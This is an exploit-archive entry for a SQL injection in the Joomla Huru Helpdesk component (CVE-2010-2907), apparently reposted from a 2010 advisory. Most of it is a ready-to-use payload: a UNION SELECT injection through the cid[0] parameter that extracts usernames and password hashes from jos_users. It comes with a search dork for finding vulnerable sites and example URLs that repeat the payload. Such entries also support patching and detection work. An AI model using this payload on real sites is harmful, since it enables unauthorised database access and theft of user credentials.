Joomla! Component Huru Helpdesk - SQL Injection (2)

Author: Amine_92
type: webapps
platform: php
port: 
date_added: 2010-07-23 
date_updated: 2016-12-19 
verified: 1 
codes: CVE-2010-2907;OSVDB-66741 
tags: 
aliases:  
screenshot_url:  
application_url: 

====================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
===================================================

Author :   Amine_92
Email  : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================

[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]

[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

====================================================
Thank's to :awras,italiano_capilo & all my friends